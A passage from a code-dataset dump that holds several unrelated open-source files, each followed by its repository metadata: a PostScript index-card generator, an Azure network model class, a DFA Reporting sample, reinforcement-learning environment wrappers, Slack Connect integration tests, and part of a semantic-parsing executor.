        input_ps,
    ]
    subprocess.call(args)

def println(line):
    """Write *line* to stdout followed by a newline."""
    sys.stdout.write(line + "\n")
######################################################################
"""
Postscript boilerplate for prolog and epilog of PS file.
Add your own Postscript procedures in prolog.
"""
PS_PROLOG = """%!PS-Adobe-2.0
%--------- Procedures ----------------
% Optimize without dict variables later, if at all
/rectPath % stk: width height left top => --
{ /t exch def
/l exch def
/h exch def
/w exch def
newpath
l t moveto
w 0 rlineto
0 h neg rlineto
w neg 0 rlineto
0 h rlineto
} def
/centershow % stk: y leftmargin rightmargin string => --
{ /s exch def
/rm exch def
/lm exch def
/y exch def
rm lm sub
s stringwidth pop sub
2 div
lm add y moveto
s show } def
/rightshow % stk: y rightmargin string => --
{ /s exch def
/rm exch def
/y exch def
s stringwidth pop
rm exch sub
y moveto
s show } def
/gridPath % stk: rows cols cellside left top => --
{ /top exch def
/left exch def
/cellside exch def
/cols exch def
/rows exch def
/width cellside cols mul def
/height cellside rows mul def
newpath
top /y exch def
left /x exch def
0 1 rows {
x y moveto
width 0 rlineto
y cellside sub /y exch def
} for
top /y exch def
left /x exch def
0 1 cols {
x y moveto
0 height neg rlineto
x cellside add /x exch def
} for
} def
%---------- PS Card --------------------
"""
PS_EPILOG = """
%---------- Epilog ---------------------
% done with this page
showpage
"""
######################################################################
"""
Constants for PS page and PS card
"""
# Points (dots) per inch in Postscript's default user space.
DPI = 72.0
def inches_to_dots(inches):
    """Convert a length in inches to Postscript points."""
    return inches * DPI
PAGE_WIDTH = inches_to_dots(8.5)
PAGE_HEIGHT = inches_to_dots(11.0)
CARD_WIDTH = inches_to_dots(3.0)
CARD_HEIGHT = inches_to_dots(5.0)
CARD_LEFT = inches_to_dots(0.0)
CARD_TOP = CARD_HEIGHT
CARD_MARGIN_X = inches_to_dots(.25)
CARD_MARGIN_Y = inches_to_dots(.25)
GRID_CELLSIZE = inches_to_dots(.25)
GRID_ROWS = 15
GRID_COLS = 10
GRID_LEFT = CARD_MARGIN_X
GRID_TOP = CARD_MARGIN_Y + GRID_ROWS * GRID_CELLSIZE
NAME_FONT = "Palatino-bold"
NAME_FONTSIZE = 13.0
FIELDS_FONT = "Palatino-medium"
FIELDS_FONTSIZE = 8.0
TITLE_HEIGHT = inches_to_dots(.25)
FIELDS_HEIGHT = inches_to_dots(.145)
TITLE_Y = CARD_TOP - CARD_MARGIN_Y + inches_to_dots(.07)
NAME_Y = TITLE_Y - TITLE_HEIGHT
ADDRESS_Y = NAME_Y - FIELDS_HEIGHT
CITY_Y = ADDRESS_Y - FIELDS_HEIGHT
EMAIL_Y = CITY_Y - FIELDS_HEIGHT
FIELD_NAME_X = inches_to_dots(2.0)
FIELD_VAL_X = inches_to_dots(2.05)
LINEWIDTH = 0.5
TEMPLATE_ROWS = 1
TEMPLATE_COLS = 1
TEMPLATE_MARGIN_BOTTOM = inches_to_dots(0.5)
TEMPLATE_MARGIN_LEFT = inches_to_dots(0.75)
######################################################################
"""
Python wrappers for PS calls. Extend as necessary. Avoid using
raw Postscript in PsCard and PsPage calls.
"""
def setFont(font, fontsize):
    """Return PS selecting *font* scaled to *fontsize* points."""
    return "/{} findfont {:f} scalefont setfont".format(font, fontsize)

def rectPath(width, height, left, top):
    """Return PS invoking the /rectPath procedure from the prolog."""
    return "{:.3f} {:.3f} {:.3f} {:.3f} rectPath".format(width, height, left, top)

def gridPath(rows, cols, cellside, left, top):
    """Return PS invoking the /gridPath procedure from the prolog."""
    return "{:d} {:d} {:.3f} {:.3f} {:.3f} gridPath".format(
        rows, cols, cellside, left, top)

def leftShow(x, y, s):
    """Return PS drawing *s* with its left edge at (x, y)."""
    return "{:.3f} {:.3f} moveto ({}) show".format(x, y, s)

def rightShow(x, y, s):
    """Return PS drawing *s* right-aligned at margin *x*, baseline *y*.

    The operands are emitted as "y x (s)" because the /rightshow procedure
    in PS_PROLOG pops the string, then the right margin, then y.
    """
    return "{:.3f} {:.3f} ({}) rightshow".format(y, x, s)

def linewidth(lw):
    """Return PS setting the current line width."""
    return "{:.3f} setlinewidth".format(lw)

def setgray(percent):
    """Return PS setting the gray level (0 = black, 1 = white)."""
    return " {:.3f} setgray".format(percent)

def translate(x, y):
    """Return PS translating the coordinate system by (x, y)."""
    return "{:.3f} {:.3f} translate".format(x, y)

def gsave():
    """Return the PS graphics-state save operator."""
    return "gsave"

def grestore():
    """Return the PS graphics-state restore operator."""
    return "grestore"

def draw_grid(lines, rows, cols, cellside, left, top):
    """Append a stroked grid path to *lines*."""
    lines.extend([gridPath(rows, cols, cellside, left, top), "stroke"])

def draw_rect(lines, width, height, left, top):
    """Append a stroked rectangle path to *lines*."""
    lines.extend([rectPath(width, height, left, top), "stroke"])
######################################################################
class PsRect(object):
    """Utility class for a Postscript rectangle.

    Postscript coordinates grow upward, so ``top`` is the larger y value and
    ``bottom = top - height``. Derived fields (bottom, right, center_x,
    center_y) are kept in sync via calc_fields().
    """
    def __init__(self, left, top, width, height):
        self.top = top
        self.left = left
        self.width = width
        self.height = height
        self.calc_fields()
    def calc_fields(self):
        """Recompute derived edges and center from left/top/width/height."""
        self.bottom = self.top-self.height
        self.right = self.left+self.width
        self.center_x = self.left+self.width/2.0
        self.center_y = self.top-self.height/2.0
    def copy(self):
        """Return an independent copy of this rect."""
        return PsRect(self.left, self.top, self.width, self.height)
    def inset(self, inset_x, inset_y):
        """Shrink in place by inset_x on each side and inset_y top/bottom.

        Returns self to allow chaining (e.g. ``r.copy().inset(2, 2)``).
        """
        self.left += inset_x
        self.top -= inset_y
        # BUG FIX: width previously shrank by 2*inset_y instead of 2*inset_x.
        self.width -= 2*inset_x
        self.height -= 2*inset_y
        # Keep the derived fields consistent after resizing (they were left
        # stale by the original implementation).
        self.calc_fields()
        return self
    def to_ps(self, lw):
        """Return Postscript drawing this rect's outline at linewidth *lw*."""
        lines = []
        lines.append(linewidth(lw))
        draw_rect(lines, self.width, self.height, self.left, self.top)
        return "\n".join(lines)
######################################################################
class PsCard(object):
    """ PsCard supports Postscript description of a single card. """
    def __init__(self):
        pass
    def to_ps(self, lines):
        # Appends this card's Postscript to *lines*, in draw order:
        # outline, name, address block, contact fields, then the ruled grid.
        rect = PsRect(CARD_LEFT, CARD_TOP, CARD_WIDTH, CARD_HEIGHT)
        lines.append(rect.to_ps(LINEWIDTH))
        # Name in the large title font; remaining fields in the smaller font.
        lines.append(setFont(NAME_FONT, NAME_FONTSIZE))
        lines.append(leftShow(CARD_MARGIN_X, NAME_Y, NAME))
        lines.append(setFont(FIELDS_FONT, FIELDS_FONTSIZE))
        lines.append(leftShow(CARD_MARGIN_X, ADDRESS_Y, ADDRESS))
        lines.append(leftShow(CARD_MARGIN_X, CITY_Y, CITY))
        lines.append(leftShow(CARD_MARGIN_X, EMAIL_Y, EMAIL))
        # Right-aligned labels (Phone/Fax/Cell) at FIELD_NAME_X ...
        lines.append(rightShow(FIELD_NAME_X, ADDRESS_Y, PHONE_FIELD))
        lines.append(rightShow(FIELD_NAME_X, CITY_Y, FAX_FIELD))
        lines.append(rightShow(FIELD_NAME_X, EMAIL_Y, CELL_FIELD))
        # ... with the corresponding values just to their right.
        lines.append(leftShow(FIELD_VAL_X, ADDRESS_Y, PHONE))
        lines.append(leftShow(FIELD_VAL_X, CITY_Y, FAX))
        lines.append(leftShow(FIELD_VAL_X, EMAIL_Y, CELL))
        # Light-gray ruled grid over the writable area of the card.
        lines.append(setgray(0.8))
        lines.append(linewidth(0.5))
        draw_grid(lines, GRID_ROWS, GRID_COLS, GRID_CELLSIZE, GRID_LEFT, GRID_TOP)
######################################################################
class PsPage(object):
    """Builds the Postscript description of a single page of cards."""
    def __init__(self):
        self.page_ps = ""
        self.page_path = ""
        self.card = PsCard()
    def cards_to_ps(self, lines):
        """Tile one card per template cell (supports multi-row/col tiling
        when TEMPLATE_ROWS / TEMPLATE_COLS are greater than 1)."""
        for row_idx in range(TEMPLATE_ROWS):
            base_y = TEMPLATE_MARGIN_BOTTOM + row_idx * CARD_HEIGHT
            for col_idx in range(TEMPLATE_COLS):
                base_x = TEMPLATE_MARGIN_LEFT + col_idx * CARD_WIDTH
                self.card_to_ps(lines, base_x, base_y)
    def card_to_ps(self, lines, x, y):
        """Emit one card translated to origin (x, y), bracketed by
        gsave/grestore so the translation does not leak."""
        lines.extend([gsave(), translate(x, y)])
        self.card.to_ps(lines)
        lines.extend([grestore(), "\n"])
    def to_ps(self):
        """Return the complete Postscript program for this page."""
        parts = [PS_PROLOG]
        self.cards_to_ps(parts)
        parts.append(PS_EPILOG)
        return "\n".join(parts)
######################################################################
OUTPUT_DIR = "C:\\"
PSCARD_PS = "ps_indexcard.ps"
PSCARD_PDF = "ps_indexcard.pdf"
def test_page():
    """Render the sample card to PS, convert it to PDF, and open a viewer."""
    page = PsPage()
    ps = page.to_ps()
    # Write the raw Postscript into the configured output directory.
    ps_path = os.path.join(OUTPUT_DIR, PSCARD_PS)
    with open(ps_path, "w") as out:
        out.write(ps)
    # Convert with Ghostscript, then display the result; both helpers just
    # print a warning if the external tool is not installed.
    pdf_path = os.path.join(OUTPUT_DIR, PSCARD_PDF)
    gs_ps2pdf(ps_path, pdf_path)
    pdfview(pdf_path)
######################################################################
if __name__ == "__main__":
test_page()
| {
"content_hash": "8f1c483f47f7e2a832a77fb3236e1a78",
"timestamp": "",
"source": "github",
"line_count": 362,
"max_line_length": 82,
"avg_line_length": 27.19889502762431,
"alnum_prop": 0.5621572212065814,
"repo_name": "ActiveState/code",
"id": "deca16c036a44334841dc8651185110361957b61",
"size": "9846",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "recipes/Python/579136_Roll_your_own_Postscript_code/recipe-579136.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "35894"
},
{
"name": "C",
"bytes": "56048"
},
{
"name": "C++",
"bytes": "90880"
},
{
"name": "HTML",
"bytes": "11656"
},
{
"name": "Java",
"bytes": "57468"
},
{
"name": "JavaScript",
"bytes": "181218"
},
{
"name": "PHP",
"bytes": "250144"
},
{
"name": "Perl",
"bytes": "37296"
},
{
"name": "Perl 6",
"bytes": "9914"
},
{
"name": "Python",
"bytes": "17387779"
},
{
"name": "Ruby",
"bytes": "40233"
},
{
"name": "Shell",
"bytes": "190732"
},
{
"name": "Tcl",
"bytes": "674650"
}
],
"symlink_target": ""
} |
from msrest.serialization import Model
class NextHopResult(Model):
"""The information about next hop from the specified VM.
:param next_hop_type: Next hop type. Possible values include: 'Internet',
'VirtualAppliance', 'VirtualNetworkGateway', 'VnetLocal',
'HyperNetGateway', 'None'
:type next_hop_type: str or
~azure.mgmt.network.v2016_09_01.models.NextHopType
:param next_hop_ip_address: Next hop IP Address
:type next_hop_ip_address: str
:param route_table_id: The resource identifier for the route table
associated with the route being returned. If the route being returned does
not correspond to any user created routes then this field will be the
string 'System Route'.
:type route_table_id: str
"""
_attribute_map = {
'next_hop_type': {'key': 'nextHopType', 'type': 'str'},
'next_hop_ip_address': {'key': 'nextHopIpAddress', 'type': 'str'},
'route_table_id': {'key': 'routeTableId', 'type': 'str'},
}
def __init__(self, next_hop_type=None, next_hop_ip_address=None, route_table_id=None):
super(NextHopResult, self).__init__()
self.next_hop_type = next_hop_type
self.next_hop_ip_address = next_hop_ip_address
self.route_table_id = route_table_id
| {
"content_hash": "a08d5f3705644ab62137d36bd9426f44",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 90,
"avg_line_length": 41.483870967741936,
"alnum_prop": 0.661741835147745,
"repo_name": "AutorestCI/azure-sdk-for-python",
"id": "645ae73c45193a76a70ef822e89b726efe2b7286",
"size": "1760",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "azure-mgmt-network/azure/mgmt/network/v2016_09_01/models/next_hop_result.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "34619070"
}
],
"symlink_target": ""
} |
"""This example displays all available content categories.
Tags: contentCategories.list
"""
__author__ = ('api.jimper@gmail.com (Jonathon Imperiosi)')
import argparse
import sys
from apiclient import sample_tools
from oauth2client import client
# Declare command-line flags.
argparser = argparse.ArgumentParser(add_help=False)
argparser.add_argument(
'profile_id', type=int,
help='The ID of the profile to look up content categories for')
def main(argv):
  """Authenticate, then page through and print all content categories."""
  # Authenticate and construct service.
  service, flags = sample_tools.init(
      argv, 'dfareporting', 'v2.0', __doc__, __file__, parents=[argparser],
      scope=['https://www.googleapis.com/auth/dfareporting',
             'https://www.googleapis.com/auth/dfatrafficking'])

  profile_id = flags.profile_id

  try:
    # Construct the request.
    request = service.contentCategories().list(profileId=profile_id)

    while True:
      # Execute request and print response.
      response = request.execute()

      for category in response.get('contentCategories', []):
        print ('Found content category with ID %s and name "%s".'
               % (category['id'], category['name']))

      # BUG FIX: 'contentCategories' and 'nextPageToken' may be absent from
      # the final page of results; direct indexing raised KeyError, so use
      # .get() for both keys.
      if response.get('contentCategories') and response.get('nextPageToken'):
        request = service.contentCategories().list_next(request, response)
      else:
        break
  except client.AccessTokenRefreshError:
    print ('The credentials have been revoked or expired, please re-run the '
           'application to re-authorize')
if __name__ == '__main__':
main(sys.argv)
| {
"content_hash": "98a2462cdb5330088de378316513bb78",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 77,
"avg_line_length": 29,
"alnum_prop": 0.6811971372804164,
"repo_name": "vanant/googleads-dfa-reporting-samples",
"id": "49bc8730adc882d0417850298bcac447dc68dc02",
"size": "2155",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/v2.0/get_content_categories.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C#",
"bytes": "414621"
},
{
"name": "CSS",
"bytes": "2434"
},
{
"name": "Java",
"bytes": "379788"
},
{
"name": "PHP",
"bytes": "401830"
},
{
"name": "Python",
"bytes": "346799"
},
{
"name": "Ruby",
"bytes": "154945"
}
],
"symlink_target": ""
} |
import numpy as np
import itertools
from gym import Env
from gym.spaces import Box
from gym.spaces import Discrete
from collections import deque
class ProxyEnv(Env):
    """Transparent wrapper around another gym Env.

    Forwards reset/step/render and any unknown attribute access to the
    wrapped environment; subclasses override individual methods to change
    behavior. The attribute name ``_wrapped_env`` is relied on by
    __getattr__ below and by subclasses — do not rename it.
    """
    def __init__(self, wrapped_env):
        self._wrapped_env = wrapped_env
        self.action_space = self._wrapped_env.action_space
        self.observation_space = self._wrapped_env.observation_space
    @property
    def wrapped_env(self):
        return self._wrapped_env
    def reset(self, **kwargs):
        return self._wrapped_env.reset(**kwargs)
    def step(self, action):
        return self._wrapped_env.step(action)
    def render(self, *args, **kwargs):
        return self._wrapped_env.render(*args, **kwargs)
    @property
    def horizon(self):
        return self._wrapped_env.horizon
    def terminate(self):
        # Only some wrapped envs implement terminate(); call it when present.
        if hasattr(self.wrapped_env, "terminate"):
            self.wrapped_env.terminate()
    def __getattr__(self, attr):
        # Raise (rather than delegate) for _wrapped_env itself to avoid
        # infinite recursion when the attribute is not yet set, e.g. during
        # unpickling before __setstate__ has run.
        if attr == '_wrapped_env':
            raise AttributeError()
        return getattr(self._wrapped_env, attr)
    def __getstate__(self):
        """
        This is useful to override in case the wrapped env has some funky
        __getstate__ that doesn't play well with overriding __getattr__.
        The main problematic case is/was gym's EzPickle serialization scheme.
        :return:
        """
        return self.__dict__
    def __setstate__(self, state):
        self.__dict__.update(state)
    def __str__(self):
        return '{}({})'.format(type(self).__name__, self.wrapped_env)
class HistoryEnv(ProxyEnv, Env):
    """Wrapper that stacks the last ``history_len`` observations into one
    flat observation vector, zero-padded until the history fills up.
    """
    def __init__(self, wrapped_env, history_len):
        super().__init__(wrapped_env)
        self.history_len = history_len
        # Stacked observation space: history_len copies of the base space,
        # flattened; bounds are left unbounded.
        high = np.inf * np.ones(
            self.history_len * self.observation_space.low.size)
        low = -high
        self.observation_space = Box(low=low,
                                     high=high,
                                     )
        self.history = deque(maxlen=self.history_len)
    def step(self, action):
        state, reward, done, info = super().step(action)
        self.history.append(state)
        flattened_history = self._get_history().flatten()
        return flattened_history, reward, done, info
    def reset(self, **kwargs):
        # BUG FIX: kwargs were accepted but silently dropped; forward them
        # to the wrapped env's reset().
        state = super().reset(**kwargs)
        self.history = deque(maxlen=self.history_len)
        self.history.append(state)
        flattened_history = self._get_history().flatten()
        return flattened_history
    def _get_history(self):
        """Return the current history padded to ``history_len`` rows."""
        observations = list(self.history)
        obs_count = len(observations)
        # Pad with zero observations until we have history_len entries.
        for _ in range(self.history_len - obs_count):
            dummy = np.zeros(self._wrapped_env.observation_space.low.size)
            observations.append(dummy)
        return np.c_[observations]
class DiscretizeEnv(ProxyEnv, Env):
    """Expose a continuous Box action space as a Discrete one.

    Samples ``num_bins`` evenly spaced values along every action dimension
    and enumerates the Cartesian product of those values; a discrete action
    index selects one continuous action vector.
    """
    def __init__(self, wrapped_env, num_bins):
        super().__init__(wrapped_env)
        lows = self.wrapped_env.action_space.low
        highs = self.wrapped_env.action_space.high
        per_dim_values = [
            np.linspace(lo, hi, num_bins) for lo, hi in zip(lows, highs)
        ]
        self.idx_to_continuous_action = [
            np.array(combo) for combo in itertools.product(*per_dim_values)
        ]
        self.action_space = Discrete(len(self.idx_to_continuous_action))
    def step(self, action):
        return super().step(self.idx_to_continuous_action[action])
class NormalizedBoxEnv(ProxyEnv):
    """
    Normalize action to in [-1, 1].
    Optionally normalize observations and scale reward.
    """
    def __init__(
            self,
            env,
            reward_scale=1.,
            obs_mean=None,
            obs_std=None,
    ):
        ProxyEnv.__init__(self, env)
        # Observation normalization is active only when stats are supplied
        # here or later estimated via estimate_obs_stats().
        self._should_normalize = not (obs_mean is None and obs_std is None)
        if self._should_normalize:
            if obs_mean is None:
                obs_mean = np.zeros_like(env.observation_space.low)
            else:
                obs_mean = np.array(obs_mean)
            if obs_std is None:
                obs_std = np.ones_like(env.observation_space.low)
            else:
                obs_std = np.array(obs_std)
        self._reward_scale = reward_scale
        self._obs_mean = obs_mean
        self._obs_std = obs_std
        ub = np.ones(self._wrapped_env.action_space.shape)
        self.action_space = Box(-1 * ub, ub)
    def estimate_obs_stats(self, obs_batch, override_values=False):
        """Estimate mean/std from *obs_batch* and enable normalization."""
        if self._obs_mean is not None and not override_values:
            raise Exception("Observation mean and std already set. To "
                            "override, set override_values to True.")
        self._obs_mean = np.mean(obs_batch, axis=0)
        self._obs_std = np.std(obs_batch, axis=0)
        # BUG FIX: enable normalization once stats exist. Previously the
        # _should_normalize flag stayed False when the env was constructed
        # without stats, so estimated values were never applied in step().
        self._should_normalize = True
    def _apply_normalize_obs(self, obs):
        # Epsilon avoids division by zero for constant observation dims.
        return (obs - self._obs_mean) / (self._obs_std + 1e-8)
    def step(self, action):
        # Map the normalized action from [-1, 1] back into the wrapped env's
        # action range, clipping to stay within bounds.
        lb = self._wrapped_env.action_space.low
        ub = self._wrapped_env.action_space.high
        scaled_action = lb + (action + 1.) * 0.5 * (ub - lb)
        scaled_action = np.clip(scaled_action, lb, ub)
        wrapped_step = self._wrapped_env.step(scaled_action)
        next_obs, reward, done, info = wrapped_step
        if self._should_normalize:
            next_obs = self._apply_normalize_obs(next_obs)
        return next_obs, reward * self._reward_scale, done, info
    def __str__(self):
        return "Normalized: %s" % self._wrapped_env
| {
"content_hash": "104751587cd230695f47dc7c05e7b325",
"timestamp": "",
"source": "github",
"line_count": 169,
"max_line_length": 77,
"avg_line_length": 32.680473372781066,
"alnum_prop": 0.585732391816042,
"repo_name": "vitchyr/rlkit",
"id": "ba83fe95cb66fdcdc8d209d69688052784225e87",
"size": "5523",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "rlkit/envs/wrappers.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "3338"
},
{
"name": "Python",
"bytes": "355210"
}
],
"symlink_target": ""
} |
import logging
import os
import time
from typing import Optional
import unittest
from slack_sdk.web.slack_response import SlackResponse
from slack_sdk.errors import SlackApiError
from integration_tests.env_variable_names import (
SLACK_SDK_TEST_CONNECT_INVITE_SENDER_BOT_TOKEN,
SLACK_SDK_TEST_CONNECT_INVITE_RECEIVER_BOT_TOKEN,
SLACK_SDK_TEST_CONNECT_INVITE_RECEIVER_BOT_USER_ID,
)
from integration_tests.helpers import async_test
from slack_sdk.web import WebClient
from slack_sdk.web.async_client import AsyncWebClient
class TestWebClient(unittest.TestCase):
"""Runs integration tests with Slack API for conversations.* endpoints
To run, we use two workspace-level bot tokens,
one for the inviting workspace(list and send invites) another for the recipient
workspace (accept and approve) sent invites. Before being able to run this test suite,
we also need to have manually created a slack connect shared channel and added
these two bots as members first. See: https://api.slack.com/apis/connect
In addition to conversations.connect:* scopes, your sender bot token should have channels:manage scopes.
"""
def setUp(self):
self.logger = logging.getLogger(__name__)
self.sender_bot_token = os.environ[
SLACK_SDK_TEST_CONNECT_INVITE_SENDER_BOT_TOKEN
]
self.receiver_bot_token = os.environ[
SLACK_SDK_TEST_CONNECT_INVITE_RECEIVER_BOT_TOKEN
]
self.sender_sync_client: WebClient = WebClient(token=self.sender_bot_token)
self.sender_async_client: AsyncWebClient = AsyncWebClient(
token=self.sender_bot_token
)
self.receiver_sync_client: WebClient = WebClient(token=self.receiver_bot_token)
self.receiver_async_client: AsyncWebClient = AsyncWebClient(
token=self.receiver_bot_token
)
def tearDown(self):
pass
def test_sync(self):
sender = self.sender_sync_client
receiver = self.receiver_sync_client
channel_id: Optional[str] = None
try:
# list senders pending connect invites
connect_invites: SlackResponse = sender.conversations_listConnectInvites()
self.assertIsNotNone(connect_invites["invites"])
# creates channel in sender workspace to share
unique_channel_name = str(int(time.time())) + "-shared"
new_channel: SlackResponse = sender.conversations_create(
name=unique_channel_name
)
self.assertIsNotNone(new_channel["channel"])
self.assertIsNotNone(new_channel["channel"]["id"])
channel_id = new_channel["channel"]["id"]
# send an invite for sender's intended shared channel to receiver's bot user id
invite: SlackResponse = sender.conversations_inviteShared(
channel=new_channel["channel"]["id"],
user_ids=os.environ[SLACK_SDK_TEST_CONNECT_INVITE_RECEIVER_BOT_USER_ID],
)
self.assertIsNotNone(invite["invite_id"])
# receiver accept conversations invite via invite id
accepted: SlackResponse = receiver.conversations_acceptSharedInvite(
channel_name=unique_channel_name,
invite_id=invite["invite_id"],
)
self.assertIsNone(accepted["error"])
# receiver attempt to approve invite already accepted by an admin level token should fail
self.assertRaises(
SlackApiError,
receiver.conversations_approveSharedInvite,
invite_id=invite["invite_id"],
)
finally:
if channel_id is not None:
# clean up created channel
delete_channel: SlackResponse = sender.conversations_archive(
channel=new_channel["channel"]["id"]
)
self.assertIsNotNone(delete_channel)
@async_test
async def test_async(self):
    """Exercise the Slack Connect shared-channel flow with the async client.

    Mirrors test_sync: list pending invites, create a channel, invite the
    receiver bot, accept as the receiver, verify double-approval fails,
    and archive the channel in the finally block.
    """
    sender = self.sender_async_client
    receiver = self.receiver_async_client
    channel_id: Optional[str] = None
    try:
        # list senders pending connect invites
        connect_invites: SlackResponse = (
            await sender.conversations_listConnectInvites()
        )
        self.assertIsNotNone(connect_invites["invites"])
        # creates channel in sender workspace to share
        unique_channel_name = str(int(time.time())) + "-shared"
        new_channel: SlackResponse = await sender.conversations_create(
            name=unique_channel_name
        )
        self.assertIsNotNone(new_channel["channel"])
        self.assertIsNotNone(new_channel["channel"]["id"])
        channel_id = new_channel["channel"]["id"]
        # send an invite for sender's intended shared channel to receiver's bot user id
        invite: SlackResponse = await sender.conversations_inviteShared(
            channel=channel_id,
            user_ids=os.environ[SLACK_SDK_TEST_CONNECT_INVITE_RECEIVER_BOT_USER_ID],
        )
        self.assertIsNotNone(invite["invite_id"])
        # receiver accept conversations invite via invite id
        accepted: SlackResponse = await receiver.conversations_acceptSharedInvite(
            channel_name=unique_channel_name,
            invite_id=invite["invite_id"],
        )
        self.assertIsNone(accepted["error"])
        # receiver attempt to approve invite already accepted by an admin level token should fail
        with self.assertRaises(SlackApiError):
            await receiver.conversations_approveSharedInvite(
                invite_id=invite["invite_id"]
            )
    finally:
        if channel_id is not None:
            # Clean up the created channel. Use channel_id so cleanup does
            # not depend on new_channel having been bound.
            delete_channel: SlackResponse = await sender.conversations_archive(
                channel=channel_id
            )
            self.assertIsNotNone(delete_channel)
| {
"content_hash": "dfca7d8c075517ee2a80ee86ef43b556",
"timestamp": "",
"source": "github",
"line_count": 144,
"max_line_length": 108,
"avg_line_length": 42.541666666666664,
"alnum_prop": 0.6297747306562194,
"repo_name": "slackapi/python-slackclient",
"id": "740b7201afd1d3addab4f2dfa94f5793fce2b2ad",
"size": "6126",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "integration_tests/web/test_conversations_connect.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "7756"
},
{
"name": "HTML",
"bytes": "5961"
},
{
"name": "Makefile",
"bytes": "7656"
},
{
"name": "Python",
"bytes": "360940"
},
{
"name": "Shell",
"bytes": "110"
}
],
"symlink_target": ""
} |
from gtd.utils import cached_property
from strongsup.executor import Executor, Denotation
from strongsup.rlong.value import RLongStateValue
from strongsup.rlong.state import RLongObject
################################
# Denotation
class RLongDenotation(tuple, Denotation):
    """A pretty lightweight class representing the intermediate denotation.

    Stored as a 3-tuple (world_state, command_history, execution_stack)
    exposed through read-only properties.
    """
    __slots__ = ()

    def __new__(cls, world_state, command_history, execution_stack):
        """Create a new RLongDenotation.

        Args:
            world_state (RLongState): Current states of the objects
            command_history (list[tuple]): List of actions and arguments
            execution_stack (list[object]): Used for building arguments
                for the next action
        """
        # The first argument of __new__ is the class; use cls (not a
        # hard-coded RLongDenotation) so subclasses construct instances
        # of themselves.
        return tuple.__new__(cls, (world_state, command_history, execution_stack))

    @property
    def world_state(self):
        return self[0]

    @property
    def command_history(self):
        return self[1]

    @property
    def execution_stack(self):
        return self[2]

    @property
    def utterance_idx(self):
        # One command is recorded per processed utterance.
        return len(self[1])
################################
# Executor
class RLongExecutor(Executor):
    """Stack-based executor for alchemy, scene, and tangrams domains.
    """
    def __init__(self, initial_state, debug=False):
        # initial_state (RLongState): world state before any command runs.
        # debug (bool): when True, prints each predicate as it is applied.
        # (This module uses Python 2 print statements.)
        self.initial_state = initial_state
        self.debug = debug
    def execute(self, y_toks, old_denotation=None):
        """Return the intermediate denotation of the formula.
        Args:
            y_toks (list[Predicate]): the formula fragment to be executed
            old_denotation (Denotation): If specified, continue execution
                from this intermediate denotation.
        Returns:
            Denotation
            The denotation is not finalized.
        Throws:
            Exception if the formula is malformed.
        """
        if not old_denotation:
            denotation = RLongDenotation(self.initial_state, [], [])
        else:
            assert isinstance(old_denotation, tuple)
            # Copy the execution stack since apply() mutates it in place;
            # world state and history are shared (never mutated).
            denotation = RLongDenotation(
                old_denotation.world_state,
                old_denotation.command_history,
                old_denotation.execution_stack[:])
        if self.debug:
            print 'Executing: {} (old deno: {})'.format(y_toks, denotation)
        for predicate in y_toks:
            denotation = self.apply(predicate.name, denotation)
            if self.debug:
                print predicate, denotation
        return denotation
    def execute_predicate(self, predicate, old_denotation=None):
        # Single-step variant of execute(): applies exactly one predicate.
        if not old_denotation:
            denotation = RLongDenotation(self.initial_state, [], [])
        else:
            assert isinstance(old_denotation, tuple)
            # Copy the stack for the same reason as in execute().
            denotation = RLongDenotation(
                old_denotation.world_state,
                old_denotation.command_history,
                old_denotation.execution_stack[:])
        return self.apply(predicate.name, denotation)
    # NOTE(review): a single shared exception instance is raised repeatedly;
    # this works but retains whichever traceback was attached last.
    STACK_NOT_EMPTY = ValueError('Cannot finalize: Stack not empty')
    def finalize(self, denotation):
        """Return the finalized denotation as list[Value].
        Return None if the denotation cannot be finalized.
        For rlong domain, a denotation can be finalized if the stack is empty.
        The result will be a list of a single RLongValue.
        """
        if denotation.execution_stack:
            raise RLongExecutor.STACK_NOT_EMPTY
        return [RLongStateValue(denotation.world_state)]
    ################################
    # Apply
    def apply(self, name, denotation):
        """Return a new denotation.
        The execution stack can be modified directly.
        But the world state and command history cannot be modified directly;
        a new Denotation object must be created.
        This happens only when an action is performed.
        Args:
            name (str): The next predicate name
            denotation (RLongDenotation): Current denotation
        Returns:
            RLongDenotation
            can be the same object as the input argument
            if only the execution stack is modified
        """
        # Dispatch on the predicate name's first character / full name.
        if len(name) == 1 and name[0].isalpha():
            # Color: Push onto the stack
            denotation.execution_stack.append(name)
            return denotation
        elif name[0] == '-' or name[0].isdigit():
            # Number: Push onto the stack
            denotation.execution_stack.append(int(name))
            return denotation
        elif name[0] == 'X':
            # Fraction: Push onto the stack
            denotation.execution_stack.append(name)
            return denotation
        elif name == 'all-objects':
            # All objects: Push onto the stack
            denotation.execution_stack.append(denotation.world_state.all_objects)
            return denotation
        elif name[0] == 'P':
            # Property: Join with the value
            value = denotation.execution_stack.pop()
            result = denotation.world_state.apply_join(value, name[1:])
            assert result, 'Empty result'
            denotation.execution_stack.append(result)
            return denotation
        elif name[0] == 'D':
            # Double-Property: Join with the values
            value2 = denotation.execution_stack.pop()
            value1 = denotation.execution_stack.pop()
            result = denotation.world_state.apply_double_join(
                value1, value2, name[1:])
            assert result, 'Empty result'
            denotation.execution_stack.append(result)
            return denotation
        elif name[0] == 'A':
            # Perform action: the only case (with 'H0'/'HUndo') that builds
            # a brand-new denotation, since world state/history change.
            new_state, history_entry = denotation.world_state.apply_action(
                name[1:], denotation.execution_stack)
            return RLongDenotation(new_state,
                                   denotation.command_history + [history_entry],
                                   denotation.execution_stack)
        elif name == 'index':
            # Perform indexing on a list of objects
            number = denotation.execution_stack.pop()
            assert isinstance(number, int)
            objects = denotation.execution_stack.pop()
            assert isinstance(objects, list)
            if number > 0:
                # Because the LF uses 1-based indexing
                denotation.execution_stack.append(objects[number - 1])
            else:
